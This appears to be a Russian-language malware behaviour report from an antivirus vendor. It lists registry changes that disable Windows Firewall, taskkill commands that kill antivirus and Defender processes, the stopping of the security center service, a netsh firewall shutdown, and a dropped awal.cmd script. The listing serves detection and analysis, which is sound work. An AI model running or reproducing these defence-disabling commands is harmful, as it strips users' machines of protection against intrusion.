Техническая информация
Изменения в системном реестре (значение 'EnableFirewall' = 0 отключает брандмауэр Windows для стандартного профиля):
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
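Запускаемые команды (принудительное завершение процессов по маске имени, в том числе антивирусных; остановка службы "security center"; отключение брандмауэра через netsh):
- '<SYSTEM32>\taskkill.exe' /f /im *AV*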
- '<SYSTEM32>\taskkill.exe' /f /im *defender*.exe
- '<SYSTEM32>\taskkill.exe' /f /im *RTP.exe
- '<SYSTEM32>\net1.exe' stop "security center"
- '<SYSTEM32>\net.exe' stop "security center"
- '<SYSTEM32>\netsh.exe' firewall set opmode mode=disable
- '<SYSTEM32>\taskkill.exe' /f /im SM?RTP.exe
- '<SYSTEM32>\taskkill.exe' /f /im *av*.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\awal.cmd""
- '<SYSTEM32>\taskkill.exe' /f /im *client*.*
- '<SYSTEM32>\taskkill.exe' /f /im *Security*.*
- '<SYSTEM32>\taskkill.exe' /f /im SM*RTP.exe
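Файлы, затрагиваемые в файловой системе (подзаголовки операций в этом фрагменте отсутствуют, поэтому один и тот же путь указан дважды; awal.cmd — тот же сценарий, что запускается через cmd.exe выше):
- %WINDIR%\awal.cmd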
- %TEMP%\1.tmp\awal.cmd
- %TEMP%\1.tmp\awal.cmd
- ClassName: '(null)' WindowName: '(null)'